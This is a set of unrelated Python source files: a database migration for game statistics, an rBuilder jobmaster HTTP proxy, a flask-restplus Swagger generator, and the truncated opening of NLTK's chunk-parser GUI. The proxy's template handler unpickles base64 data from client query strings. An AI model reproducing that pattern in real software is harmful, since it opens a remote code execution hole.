sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_population_snapshot_match_id'), 'population_snapshot', ['match_id'], unique=False)
op.create_table('survivor',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('mindname', sa.String(), nullable=True),
sa.Column('mindkey', sa.String(length=30), nullable=True),
sa.Column('special_role', sa.String(), nullable=True),
sa.Column('mob_typepath', sa.String(), nullable=True),
sa.Column('damage_brute', sa.Integer(), nullable=True),
sa.Column('damage_fire', sa.Integer(), nullable=True),
sa.Column('damage_toxin', sa.Integer(), nullable=True),
sa.Column('damage_oxygen', sa.Integer(), nullable=True),
sa.Column('damage_clone', sa.Integer(), nullable=True),
sa.Column('damage_brain', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_survivor_match_id'), 'survivor', ['match_id'], unique=False)
op.create_table('uplink_buy',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('mindname', sa.String(), nullable=True),
sa.Column('mindkey', sa.String(length=30), nullable=True),
sa.Column('traitor_buyer', sa.Boolean(), nullable=True),
sa.Column('bundle_path', sa.String(), nullable=True),
sa.Column('item_path', sa.String(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_uplink_buy_match_id'), 'uplink_buy', ['match_id'], unique=False)
op.create_table('badass_bundle_item',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('badass_bundle_id', sa.Integer(), nullable=True),
sa.Column('item_path', sa.String(), nullable=True),
sa.ForeignKeyConstraint(['badass_bundle_id'], ['badass_bundle_buy.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_badass_bundle_item_badass_bundle_id'), 'badass_bundle_item', ['badass_bundle_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_badass_bundle_item_badass_bundle_id'), table_name='badass_bundle_item')
op.drop_table('badass_bundle_item')
op.drop_index(op.f('ix_uplink_buy_match_id'), table_name='uplink_buy')
op.drop_table('uplink_buy')
op.drop_index(op.f('ix_survivor_match_id'), table_name='survivor')
op.drop_table('survivor')
op.drop_index(op.f('ix_population_snapshot_match_id'), table_name='population_snapshot')
op.drop_table('population_snapshot')
op.drop_table('match_revsquad_item')
op.drop_table('match_malf_module')
op.drop_index(op.f('ix_explosion_match_id'), table_name='explosion')
op.drop_table('explosion')
op.drop_index(op.f('ix_death_match_id'), table_name='death')
op.drop_table('death')
op.drop_index(op.f('ix_badass_bundle_buy_match_id'), table_name='badass_bundle_buy')
op.drop_table('badass_bundle_buy')
op.drop_index(op.f('ix_antag_objective_match_id'), table_name='antag_objective')
op.drop_table('antag_objective')
op.drop_table('revsquad_item')
op.drop_index(op.f('ix_match_mastermode'), table_name='match')
op.drop_table('match')
op.drop_table('malf_module')
# ### end Alembic commands ###
| |
#!/usr/bin/python
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Implements a proxy that relays status, results, etc. upstream to the rBuilder.
When a node is started we store a mapping from their IPv6 address to the
URL of the rBuilder that created the job that the node is running. Then any
requests that come in are checked first to see if they are addressed to a
feature of the jobmaster itself (e.g. the template generator). If not, the
request path is checked against a whitelist and forwarded to the originating
rBuilder.
"""
import asyncore
import base64
import cgi
import cPickle
import errno
import logging
import os
import re
import socket
import sys
import threading
import urllib
import urlparse
import weakref
from conary.lib.log import setupLogging
from jobmaster.templategen import TemplateGenerator
log = logging.getLogger(__name__)
ALLOWED_PATHS = {
'GET': [
re.compile('^/downloadImage?.*'),
re.compile('^/images/'),
],
'POST': [
re.compile('^/api/v1/images/\d+/build_log$'),
],
'PUT': [
re.compile('^/uploadBuild/\d+/'),
re.compile('^/api/v1/images/\d+/?$'),
re.compile('^/api/v1/images/\d+/build_files$'),
],
}
class ConnectionClosed(Exception):
pass
class ProxyServer(asyncore.dispatcher):
def __init__(self, port=0, _map=None, jobmaster=None):
asyncore.dispatcher.__init__(self, None, _map)
self.jobmaster = jobmaster and weakref.ref(jobmaster)
self.create_socket(socket.AF_INET6, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bind(('::', port))
self.port = self.socket.getsockname()[1]
self.listen(5)
self.lock = threading.Lock()
self.targetMap = {}
def serve_forever(self):
asyncore.loop(use_poll=True, map=self._map)
def handle_accept(self):
while True:
try:
sock, _ = self.socket.accept()
except socket.error, err:
if err.args[0] == errno.EAGAIN:
break
raise
else:
ProxyClient(sock, self._map, self)
def addTarget(self, address, targetUrl):
if not isinstance(address, basestring):
address = address.format(useMask=False)
self.lock.acquire()
try:
(existing, refs) = self.targetMap.get(address, (None, 0))
if existing and existing != targetUrl:
raise RuntimeError("You must use network containers when "
"sharing a jobmaster between head nodes")
refs += 1
self.targetMap[address] = (targetUrl, refs)
finally:
self.lock.release()
def removeTarget(self, address):
if not isinstance(address, basestring):
address = address.format(useMask=False)
self.lock.acquire()
try:
(targetUrl, refs) = self.targetMap[address]
assert refs > 0
refs -= 1
if refs:
self.targetMap[address] = (targetUrl, refs)
else:
del self.targetMap[address]
finally:
self.lock.release()
def findTarget(self, address):
self.lock.acquire()
try:
target = self.targetMap.get(address)
if target is None:
return None
(targetUrl, refs) = target
assert refs > 0
return targetUrl
finally:
self.lock.release()
(STATE_HEADER, STATE_COPY_ALL, STATE_COPY_SIZE, STATE_COPY_CHUNKED,
STATE_COPY_TRAILER, STATE_CLOSING) = range(6)
class ProxyDispatcher(asyncore.dispatcher):
"""asyncore handler for the jobmaster proxy server"""
chunk_size = 8192
buffer_threshold = chunk_size * 8
def __init__(self, sock, _map, server, pair=None):
asyncore.dispatcher.__init__(self, sock, _map)
self._server = weakref.ref(server)
self.in_buffer = self.out_buffer = ''
self.state = STATE_HEADER
self.copy_remaining = 0L
self._remote = None
self._pair = pair and weakref.ref(pair) or None
@property
def server(self):
return self._server()
@property
def pair(self):
return self._pair and self._pair()
@property
def name(self):
if not self.socket:
return ''
if self._remote is None:
try:
peer = self.socket.getpeername()
except:
self._remote = ''
else:
self._remote = '[%s]:%s' % peer[:2]
return self._remote
@staticmethod
def _parse_header(header):
lines = header.rstrip().split('\r\n')
firstline = lines.pop(0)
headers = {}
for line in lines:
if ':' not in line:
continue
key, value = line.split(':', 1)
value = value.lstrip()
headers[key.lower()] = value
return firstline, headers
# Sending machinery
def send(self, data):
"""
Send C{data} as soon as possible, without blocking.
"""
self.out_buffer += data
self._do_send()
def _do_send(self):
"""
Try to send the current contents of the send queue.
"""
if not self.connected:
return
while self.out_buffer:
try:
sent = self.socket.send(self.out_buffer)
except socket.error, err:
if err.args[0] == errno.EAGAIN:
# OS send queue is full; save the rest for later.
break
else:
if err.args[0] not in (errno.ECONNRESET, errno.EPIPE):
log.debug("Closing socket due to write error %s",
str(err))
raise ConnectionClosed
else:
self.out_buffer = self.out_buffer[sent:]
if self.state == STATE_CLOSING:
# Write buffer is flushed; close it now.
raise ConnectionClosed
def handle_write(self):
self._do_send()
def writable(self):
return (not self.connected) or len(self.out_buffer)
# Receiving machinery
def handle_read(self):
try:
data = self.socket.recv(self.chunk_size)
except socket.error, err:
if err.args[0] == errno.EAGAIN:
# OS recv queue is empty.
return
else:
if err.args[0] not in (errno.ECONNRESET, errno.EPIPE):
log.debug("Closing socket due to read error %s", str(err))
raise ConnectionClosed
if True or self.state != STATE_CLOSING:
self.in_buffer += data
self._do_recv()
if not data:
raise ConnectionClosed
def _do_recv(self):
"""
Try to process the contents of the input queue.
"""
last = None
while self.in_buffer:
# Keep processing until the input buffer stops shrinking.
if (self.state, len(self.in_buffer)) == last:
break
last = self.state, len(self.in_buffer)
if self.state == STATE_HEADER:
# Skip blank lines like those Conary likes to send when it
# hasn't received any data for a while.
while self.in_buffer.startswith('\r\n'):
self.in_buffer = self.in_buffer[2:]
end = self.in_buffer.find('\r\n\r\n')
if end > -1:
end += 4
header, self.in_buffer = (self.in_buffer[:end],
self.in_buffer[end:])
self.handle_header(header)
elif len(self.in_buffer) > self.buffer_threshold:
log.warning("Dropping connection due to excessively large "
"header.")
raise ConnectionClosed
else:
self.handle_copy()
def readable(self):
# Read data if we're processing headers (not copying), or we're copying
# and the pair socket is not full.
return ((not self.connected) or self.state == STATE_HEADER
or self.pair_copyable())
def handle_header(self, header):
raise NotImplementedError
# Copying machinery
def copyable(self):
"""Return True if the output buffer can accept more bytes."""
return len(self.out_buffer) < self.buffer_threshold
def pair_copyable(self):
"""Return True if there is a pair socket and it is copyable."""
return self.pair and self.pair.copyable()
def start_copy(self, headers):
"""Set copy mode based on the info in the given headers."""
assert self.state == STATE_HEADER
if 'transfer-encoding' in headers:
if headers['transfer-encoding'] != 'chunked':
log.error("Don't know how to copy transfer encoding %r",
headers['transfer-encoding'])
raise ConnectionClosed
self.copy_remaining = 0L
self.state = STATE_COPY_CHUNKED
elif 'content-length' in headers:
self.copy_remaining = long(headers['content-length'])
self.state = STATE_COPY_SIZE
else:
self.state = STATE_COPY_ALL
def handle_copy(self):
"""Handle input while in copy mode."""
if not self.pair:
# Copy to whom?
raise ConnectionClosed
if self.state == STATE_COPY_ALL:
copyBytes = len(self.in_buffer)
elif self.state == STATE_COPY_SIZE:
copyBytes = min(len(self.in_buffer), self.copy_remaining)
if not copyBytes:
# Done copying fixed-length entity; back to reading headers.
self.state = STATE_HEADER
return
elif self.state == STATE_COPY_CHUNKED:
if not self.copy_remaining:
# Read the size of the next chunk.
end = self.in_buffer.find('\r\n')
if end < 0:
if len(self.in_buffer) > self.buffer_threshold:
log.warning("Very large chunk header; "
"closing connection.")
raise ConnectionClosed
# No chunk header yet.
return
header = self.in_buffer[:end].split(';')[0]
try:
next_size = int(header, 16)
except ValueError:
log.error("Bad chunk header; closing connection.")
raise ConnectionClosed
self.copy_remaining = end + 2 + next_size
if next_size:
# Copy the CRLF after the chunk data.
self.copy_remaining += 2
else:
# Last chunk. Switch to trailer mode.
self.state = STATE_COPY_TRAILER
copyBytes = min(len(self.in_buffer), self.copy_remaining)
elif self.state == STATE_COPY_TRAILER:
if len(self.in_buffer) < 2:
# Not enough bytes to determine whether there is a trailer.
return
elif self.in_buffer[:2] == '\r\n':
# No trailer.
copyBytes = 2
else:
end = self.in_buffer.find('\r\n\r\n')
if end < 0:
return
# Trailer found.
copyBytes = end + 4
self.state = STATE_HEADER
else:
assert False
buf = self.in_buffer[:copyBytes]
self.in_buffer = self.in_buffer[copyBytes:]
self.pair.send(buf)
if self.state in (STATE_COPY_SIZE, STATE_COPY_CHUNKED):
self.copy_remaining -= copyBytes
# Cleanup machinery
def handle_close(self):
"""Handle an asyncore close event."""
# Throw to make sure further events don't get called, and so there is
# only one place that close events get handled.
raise ConnectionClosed
def handle_error(self):
"""Handle an asyncore error event."""
e_class = sys.exc_info()[0]
if e_class is not ConnectionClosed:
log.exception("Unhandled exception in proxy handler; "
"closing connection:")
self.close()
def close(self):
"""Close the dispatcher object and its socket."""
asyncore.dispatcher.close(self)
pair, self._pair = self.pair, None
if pair:
pair.pair_closed()
def pair_closed(self):
"""Handle the paired socket having closed."""
class ProxyClient(ProxyDispatcher):
upstream = None
def pair_closed(self):
"""Handle the upstream socket closing by changing to CLOSED state."""
if self.out_buffer:
# Don't close the connection until the send queue is empty.
self.state = STATE_CLOSING
else:
self.close()
def handle_header(self, request):
"""
Parse a request from the client and direct it where it needs to go.
"""
requestline, headers = self._parse_header(request)
words = requestline.split()
if len(words) != 3:
log.error("Dropping client with unsupported request line: %s",
requestline)
raise ConnectionClosed
method, path, version = words
if version != 'HTTP/1.1':
log.error("Dropping client with unsupported HTTP version %s",
version)
raise ConnectionClosed
log.debug('%s "%s"', self.name, requestline)
if path.startswith('/templates/'):
return self.do_templates(method, path, headers)
else:
return self.do_proxy(request, method, path, headers)
def send_response(self, response, headers, body=''):
"""Send a simple HTTP response."""
headers.append('Content-Length: %s' % len(body))
self.send('HTTP/1.1 %s\r\n%s\r\n\r\n%s' % (response,
'\r\n'.join(headers), body))
def send_text(self, response, body):
"""Send a simple HTTP response with text/plain content."""
self.send_response(response, ['Content-Type: text/plain'], body)
def do_proxy(self, request, method, path, headers):
"""Attempt to proxy a request upstream."""
proxyOK = False
paths = ALLOWED_PATHS.get(method)
if paths:
for pattern in paths:
if pattern.match(path):
proxyOK = True
break
if not proxyOK:
return self.send_text('403 Forbidden',
'Proxying not permitted\r\n')
if self.pair:
self.pair.send(request)
else:
# Note that we don't need to keep a strong reference to the paired
# connection because one is kept in the asyncore poll map.
upstream = ProxyUpstream(None, self._map, self._server(), self)
upstream._pair = weakref.ref(self)
upstream.send(request)
self._connect(upstream)
self.start_copy(headers)
def _connect(self, upstream):
# Figure out who we're proxying to.
peer = self.socket.getpeername()[0]
url = self.server.findTarget(peer)
if not url:
return self.send_text('403 Forbidden', 'Peer not recognized\r\n')
# Split the URL to get the hostname.
scheme, url = urllib.splittype(url)
if scheme != 'http':
return self.send_text('504 Gateway Timeout',
'Invalid target URL\r\n')
host, port = _split_hostport(urllib.splithost(url)[0])
# Resolve the hostname to an address.
try:
addresses = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
except socket.gaierror, err:
log.error("Error resolving target URL: %s", err)
addresses = []
if not addresses:
return self.send_text('504 Gateway Timeout',
'Unknown target URL\r\n')
# Create the right socket type and initiate the connection (which may
# not complete immediately).
family, socktype, _, _, address = addresses[0]
upstream.create_socket(family, socktype)
upstream.connect(address)
self._pair = weakref.ref(upstream)
def do_templates(self, method, path, headers):
"""Handle a request to get anaconda templates."""
clength = headers.get('content-length', 0)
if clength != 0:
# Implementing this would add a lot of complexity for something we
# can handle entirely in URI parameters.
return self.send_text('400 Bad Request',
'Request body not allowed here.\r\n')
# Figure out who we're proxying to.
peer = self.socket.getpeername()[0]
url = self.server.findTarget(peer)
if not url:
return self.send_text('403 Forbidden', 'Peer not recognized\r\n')
# Figure out what they want.
path, _, query = urlparse.urlparse(path)[2:5]
assert path.startswith('/templates/')
path = path[11:]
query = cgi.parse_qs(query)
if method == 'GET' and path == 'getTemplate':
try:
blob = base64.urlsafe_b64decode(query['p'][0])
params = cPickle.loads(blob)
except:
log.warning("Bad getTemplate request:", exc_info=True)
return self.send_text('400 Bad Request',
'Bad arguments for getTemplate\r\n')
start = not query.get('nostart', 0)
if start:
log.debug("Client requested template %s=%s[%s]",
*params['templateTup'][0])
jobmaster = self.server.jobmaster()
assert jobmaster
conaryCfg = jobmaster.getConaryConfig(url)
workDir = jobmaster.cfg.getTemplateCache()
generator = TemplateGenerator(params['templateTup'],
params['kernelTup'], conaryCfg, workDir)
status, path = generator.getTemplate(start)
path = os.path.basename(path)
if generator.pid:
# Make sure the main event loop will reap the generator when it
# quits.
jobmaster.subprocesses.append(generator)
return self.send_text('200 OK', '%s\r\n%s\r\n' % (
generator.Status.values[status], path))
else:
return self.send_text('404 Not Found', 'Unknown function\r\n')
class ProxyUpstream(ProxyDispatcher):
def pair_closed(self):
self.close()
def handle_connect(self):
if not self.pair:
raise ConnectionClosed
self._do_send()
def handle_read(self):
if not self.pair:
raise ConnectionClosed
ProxyDispatcher.handle_read(self)
def handle_header(self, response):
responseline, headers = self._parse_header(response)
code = responseline.split(' ', 2)[1]
code = int(code)
if 100 <= code < 200:
# 1xx codes don't have an entity.
pass
else:
self.start_copy(headers)
self.pair.send(response)
def _split_hostport(host):
i = host.rfind(':')
j = host.rfind(']')
if i > j:
port = int(host[i+1:])
host = host[:i]
else:
port = 80
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return host, port
def test():
import epdb, signal
print os.getpid()
def hdlr(signum, sigtb):
epdb.serve()
signal.signal(signal.SIGUSR1, hdlr)
setupLogging(consoleLevel=logging.DEBUG, consoleFormat='file')
s = ProxyServer(7770)
try:
asyncore.loop(use_poll=True)
except KeyboardInterrupt:
print
if __name__ == '__main__':
test()
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import re
from inspect import isclass, getdoc
from collections import Hashable
from six import string_types, itervalues, iteritems, iterkeys
from flask import current_app
from ._compat import OrderedDict
from . import fields
from .model import Model, ModelBase
from .reqparse import RequestParser
from .utils import merge, not_none, not_none_sorted
#: Maps Flask/Werkzeug rooting types to Swagger ones
PATH_TYPES = {
'int': 'integer',
'float': 'number',
'string': 'string',
None: 'string',
}
#: Maps Pyton primitives types to Swagger ones
PY_TYPES = {
int: 'integer',
str: 'string',
bool: 'boolean',
None: 'void'
}
RE_URL = re.compile(r'<(?:[^:<>]+:)?([^<>]+)>')
RE_PARAMS = re.compile(r'<((?:[^:<>]+:)?[^<>]+)>')
DEFAULT_RESPONSE_DESCRIPTION = 'Success'
DEFAULT_RESPONSE = {'description': DEFAULT_RESPONSE_DESCRIPTION}
RE_RAISES = re.compile(r'^:raises\s+(?P<name>[\w\d_]+)\s*:\s*(?P<description>.*)$', re.MULTILINE)
def ref(model):
'''Return a reference to model in definitions'''
name = model.name if isinstance(model, ModelBase) else model
return {'$ref': '#/definitions/{0}'.format(name)}
def _v(value):
'''Dereference values (callable)'''
return value() if callable(value) else value
def extract_path(path):
'''
Transform a Flask/Werkzeug URL pattern in a Swagger one.
'''
return RE_URL.sub(r'{\1}', path)
def extract_path_params(path):
'''
Extract Flask-style parameters from an URL pattern as Swagger ones.
'''
params = OrderedDict()
for match in RE_PARAMS.findall(path):
descriptor, name = match.split(':') if ':' in match else (None, match)
param = {
'name': name,
'in': 'path',
'required': True
}
if descriptor in PATH_TYPES:
param['type'] = PATH_TYPES[descriptor]
elif descriptor in current_app.url_map.converters:
param['type'] = 'string'
else:
raise ValueError('Unsupported type converter')
params[name] = param
return params
def _param_to_header(param):
param.pop('in', None)
param.pop('name', None)
typedef = param.get('type', 'string')
if isinstance(typedef, Hashable) and typedef in PY_TYPES:
param['type'] = PY_TYPES[typedef]
elif hasattr(typedef, '__schema__'):
param.update(typedef.__schema__)
else:
param['type'] = typedef
return param
def parse_docstring(obj):
raw = getdoc(obj)
summary = raw.strip(' \n').split('\n')[0].split('.')[0] if raw else None
raises = {}
details = raw.replace(summary, '').lstrip('. \n').strip(' \n') if raw else None
for match in RE_RAISES.finditer(raw or ''):
raises[match.group('name')] = match.group('description')
if details:
details = details.replace(match.group(0), '')
parsed = {
'raw': raw,
'summary': summary or None,
'details': details or None,
'returns': None,
'params': [],
'raises': raises,
}
return parsed
class Swagger(object):
'''
A Swagger documentation wrapper for an API instance.
'''
def __init__(self, api):
self.api = api
self._registered_models = {}
def as_dict(self):
'''
Output the specification as a serializable ``dict``.
:returns: the full Swagger specification in a serializable format
:rtype: dict
'''
basepath = self.api.base_path
if len(basepath) > 1 and basepath.endswith('/'):
basepath = basepath[:-1]
infos = {
'title': _v(self.api.title),
'version': _v(self.api.version),
}
if self.api.description:
infos['description'] = _v(self.api.description)
if self.api.terms_url:
infos['termsOfService'] = _v(self.api.terms_url)
if self.api.contact and (self.api.contact_email or self.api.contact_url):
infos['contact'] = {
'name': _v(self.api.contact),
'email': _v(self.api.contact_email),
'url': _v(self.api.contact_url),
}
if self.api.license:
infos['license'] = {'name': _v(self.api.license)}
if self.api.license_url:
infos['license']['url'] = _v(self.api.license_url)
paths = {}
tags = self.extract_tags(self.api)
# register errors
responses = self.register_errors()
for ns in self.api.namespaces:
for resource, urls, kwargs in ns.resources:
for url in urls:
paths[extract_path(url)] = self.serialize_resource(ns, resource, url, kwargs)
specs = {
'swagger': '2.0',
'basePath': basepath,
'paths': not_none_sorted(paths),
'info': infos,
'produces': list(iterkeys(self.api.representations)),
'consumes': ['application/json'],
'securityDefinitions': self.api.authorizations or None,
'security': self.security_requirements(self.api.security) or None,
'tags': tags,
'definitions': self.serialize_definitions() or None,
'responses': responses or None,
'host': self.get_host(),
}
return not_none(specs)
def get_host(self):
hostname = current_app.config.get('SERVER_NAME', None) or None
if hostname and self.api.blueprint and self.api.blueprint.subdomain:
hostname = '.'.join((self.api.blueprint.subdomain, hostname))
return hostname
def extract_tags(self, api):
tags = []
by_name = {}
for tag in api.tags:
if isinstance(tag, string_types):
tag = {'name': tag}
elif isinstance(tag, (list, tuple)):
tag = {'name': tag[0], 'description': tag[1]}
elif isinstance(tag, dict) and 'name' in tag:
pass
else:
raise ValueError('Unsupported tag format for {0}'.format(tag))
tags.append(tag)
by_name[tag['name']] = tag
for ns in api.namespaces:
if ns.name not in by_name:
tags.append({
'name': ns.name,
'description': ns.description
})
elif ns.description:
by_name[ns.name]['description'] = ns.description
return tags
def extract_resource_doc(self, resource, url):
doc = getattr(resource, '__apidoc__', {})
if doc is False:
return False
doc['name'] = resource.__name__
params = merge(self.expected_params(doc), doc.get('params', {}))
params = merge(params, extract_path_params(url))
doc['params'] = params
for method in [m.lower() for m in resource.methods or []]:
method_doc = doc.get(method, OrderedDict())
method_impl = getattr(resource, method)
if hasattr(method_impl, 'im_func'):
method_impl = method_impl.im_func
elif hasattr(method_impl, '__func__'):
method_impl = method_impl.__func__
method_doc = merge(method_doc, getattr(method_impl, '__apidoc__', OrderedDict()))
if method_doc is not False:
method_doc['docstring'] = parse_docstring(method_impl)
method_params = self.expected_params(method_doc)
method_params = merge(method_params, method_doc.get('params', {}))
inherited_params = dict((k, v) for k, v in iteritems(params) if k in method_params)
method_doc['params'] = merge(inherited_params, method_params)
doc[method] = method_doc
return doc
def expected_params(self, doc):
params = {}
if 'expect' not in doc:
return params
for expect in doc.get('expect', []):
if isinstance(expect, RequestParser):
parser_params = dict((p['name'], p) for p in expect.__schema__)
params.update(parser_params)
elif isinstance(expect, ModelBase):
params['payload'] = not_none({
'name': 'payload',
'required': True,
'in': 'body',
'schema': self.serialize_schema(expect),
})
elif isinstance(expect, (list, tuple)):
if len(expect) == 2:
# this is (payload, description) shortcut
model, description = expect
params['payload'] = not_none({
'name': 'payload',
'required': True,
'in': 'body',
'schema': self.serialize_schema(model),
'description': description
})
else:
params['payload'] = not_none({
'name': 'payload',
'required': True,
'in': 'body',
'schema': self.serialize_schema(expect),
})
return params
def register_errors(self):
responses = {}
for exception, handler in self.api.error_handlers.items():
doc = parse_docstring(handler)
response = {
'description': doc['summary']
}
apidoc = getattr(handler, '__apidoc__', {})
if 'params' in apidoc:
response['headers'] = dict(
(n, _param_to_header(o))
for n, o in apidoc['params'].items() if o.get('in') == 'header'
)
if 'responses' in apidoc:
_, model = list(apidoc['responses'].values())[0]
response['schema'] = self.serialize_schema(model)
responses[exception.__name__] = not_none(response)
return responses
def serialize_resource(self, ns, resource, url, kwargs):
doc = self.extract_resource_doc(resource, url)
if doc is False:
return
path = {
'parameters': self.parameters_for(doc) or None
}
for method in [m.lower() for m in resource.methods or []]:
methods = [m.lower() for m in kwargs.get('methods', [])]
if doc[method] is False or methods and method not in methods:
continue
path[method] = self.serialize_operation(doc, method)
path[method]['tags'] = [ns.name]
return not_none(path)
def serialize_operation(self, doc, method):
operation = {
'responses': self.responses_for(doc, method) or None,
'summary': doc[method]['docstring']['summary'],
'description': self.description_for(doc, method) or None,
'operationId': self.operation_id_for(doc, method),
'parameters': self.parameters_for(doc[method]) or None,
'security': self.security_for(doc, method),
}
# Handle deprecated annotation
if doc.get('deprecated') or doc[method].get('deprecated'):
operation['deprecated'] = True
# Handle form exceptions:
if operation['parameters'] and any(p['in'] == 'formData' for p in operation['parameters']):
if any(p['type'] == 'file' for p in operation['parameters']):
operation['consumes'] = ['multipart/form-data']
else:
operation['consumes'] = ['application/x-www-form-urlencoded', 'multipart/form-data']
return not_none(operation)
def description_for(self, doc, method):
'''Extract the description metadata and fallback on the whole docstring'''
parts = []
if 'description' in doc:
parts.append(doc['description'])
if method in doc and 'description' in doc[method]:
parts.append(doc[method]['description'])
if doc[method]['docstring']['details']:
parts.append(doc[method]['docstring']['details'])
return '\n'.join(parts).strip()
def operation_id_for(self, doc, method):
'''Extract the operation id'''
return doc[method]['id'] if 'id' in doc[method] else self.api.default_id(doc['name'], method)
def parameters_for(self, doc):
params = []
for name, param in iteritems(doc['params']):
param['name'] = name
if 'type' not in param and 'schema' not in param:
param['type'] = 'string'
if 'in' not in param:
param['in'] = 'query'
if 'type' in param and 'schema' not in param:
ptype = param.get('type', None)
if isinstance(ptype, (list, tuple)):
typ = ptype[0]
param['type'] = 'array'
param['items'] = {'type': PY_TYPES.get(typ, typ)}
elif isinstance(ptype, (type, type(None))) and ptype in PY_TYPES:
param['type'] = PY_TYPES[ptype]
params.append(param)
# Handle fields mask
mask = doc.get('__mask__')
if (mask and current_app.config['RESTPLUS_MASK_SWAGGER']):
param = {
'name': current_app.config['RESTPLUS_MASK_HEADER'],
'in': 'header',
'type': 'string',
'format': 'mask',
'description': 'An optional fields mask',
}
if isinstance(mask, string_types):
param['default'] = mask
params.append(param)
return params
def responses_for(self, doc, method):
# TODO: simplify/refactor responses/model handling
responses = {}
for d in doc, doc[method]:
if 'responses' in d:
for code, response in iteritems(d['responses']):
description, model = (response, None) if isinstance(response, string_types) else response
description = description or DEFAULT_RESPONSE_DESCRIPTION
if code in responses:
responses[code].update(description=description)
else:
responses[code] = {'description': description}
if model:
responses[code]['schema'] = self.serialize_schema(model)
if 'model' in d:
code = str(d.get('default_code', 200))
if code not in responses:
responses[code] = DEFAULT_RESPONSE.copy()
responses[code]['schema'] = self.serialize_schema(d['model'])
if 'docstring' in d:
for name, description in d['docstring']['raises'].items():
for exception, handler in self.api.error_handlers.items():
error_responses = getattr(handler, '__apidoc__', {}).get('responses', {})
code = list(error_responses.keys())[0] if error_responses else None
if code and exception.__name__ == name:
responses[code] = {'$ref': '#/responses/{0}'.format(name)}
break
if not responses:
responses['200'] = DEFAULT_RESPONSE.copy()
return responses
def serialize_definitions(self):
return dict(
(name, model.__schema__)
for name, model in iteritems(self._registered_models)
)
def serialize_schema(self, model):
if isinstance(model, (list, tuple)):
model = model[0]
return {
'type': 'array',
'items': self.serialize_schema(model),
}
elif isinstance(model, ModelBase):
self.register_model(model)
return ref(model)
elif isinstance(model, string_types):
self.register_model(model)
return ref(model)
elif isclass(model) and issubclass(model, fields.Raw):
return self.serialize_schema(model())
elif isinstance(model, fields.Raw):
return model.__schema__
elif isinstance(model, (type, type(None))) and model in PY_TYPES:
return {'type': PY_TYPES[model]}
raise ValueError('Model {0} not registered'.format(model))
def register_model(self, model):
name = model.name if isinstance(model, ModelBase) else model
if name not in self.api.models:
raise ValueError('Model {0} not registered'.format(name))
specs = self.api.models[name]
self._registered_models[name] = specs
if isinstance(specs, ModelBase):
for parent in specs.__parents__:
self.register_model(parent)
if isinstance(specs, Model):
for field in itervalues(specs):
self.register_field(field)
return ref(model)
def register_field(self, field):
if isinstance(field, fields.Polymorph):
for model in itervalues(field.mapping):
self.register_model(model)
elif isinstance(field, fields.Nested):
self.register_model(field.nested)
elif isinstance(field, fields.List):
self.register_field(field.container)
def security_for(self, doc, method):
security = None
if 'security' in doc:
auth = doc['security']
security = self.security_requirements(auth)
if 'security' in doc[method]:
auth = doc[method]['security']
security = self.security_requirements(auth)
return security
def security_requirements(self, value):
if isinstance(value, (list, tuple)):
return [self.security_requirement(v) for v in value]
elif value:
requirement = self.security_requirement(value)
return [requirement] if requirement else None
else:
return []
def security_requirement(self, value):
if isinstance(value, (string_types)):
return {value: []}
elif isinstance(value, dict):
return dict(
(k, v if isinstance(v, (list, tuple)) else [v])
for k, v in iteritems(value)
)
else:
return None
| |
# Natural Language Toolkit: Regexp Chunk Parser Application
#
# Copyright (C) 2001-2011 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: srparser.py 5609 2007-12-31 03:02:41Z stevenbird $
"""
A graphical tool for exploring the regular expression based chunk
parser (L{RegexpChunkParser<nltk.chunk.regex.RegexpChunkParser>}).
@todo: Add a way to select the development set from the menubar. This
might just need to be a selection box (conll vs treebank etc) plus
configuration parameters to select what's being chunked (eg VP vs NP)
and what part of the data is being used as the development set.
"""
import time
import textwrap
import re
import random
import nltk
from nltk.tree import Tree
from nltk.util import in_idle
from nltk.draw.util import *
class RegexpChunkApp(object):
"""
A graphical tool for exploring the regular expression based chunk
parser (L{RegexpChunkParser<nltk.chunk.regex.RegexpChunkParser>}).
See L{HELP} for instructional text.
"""
##/////////////////////////////////////////////////////////////////
## Help Text
##/////////////////////////////////////////////////////////////////
#: A dictionary mapping from part of speech tags to descriptions,
#: which is used in the help text. (This should probably live with
#: the conll and/or treebank corpus instead.)
TAGSET = {
'CC': 'Coordinating conjunction', 'PRP$': 'Possessive pronoun',
'CD': 'Cardinal number', 'RB': 'Adverb',
'DT': 'Determiner', 'RBR': 'Adverb, comparative',
'EX': 'Existential there', 'RBS': 'Adverb, superlative',
'FW': 'Foreign word', 'RP': 'Particle',
'JJ': 'Adjective', 'TO': 'to',
'JJR': 'Adjective, comparative', 'UH': 'Interjection',
'JJS': 'Adjective, superlative', 'VB': 'Verb, base form',
'LS': 'List item marker', 'VBD': 'Verb, past tense',
'MD': 'Modal', 'NNS': 'Noun, plural',
'NN': 'Noun, singular or masps', 'VBN': 'Verb, past participle',
'VBZ': 'Verb,3rd ps. sing. present', 'NNP': 'Proper noun, singular',
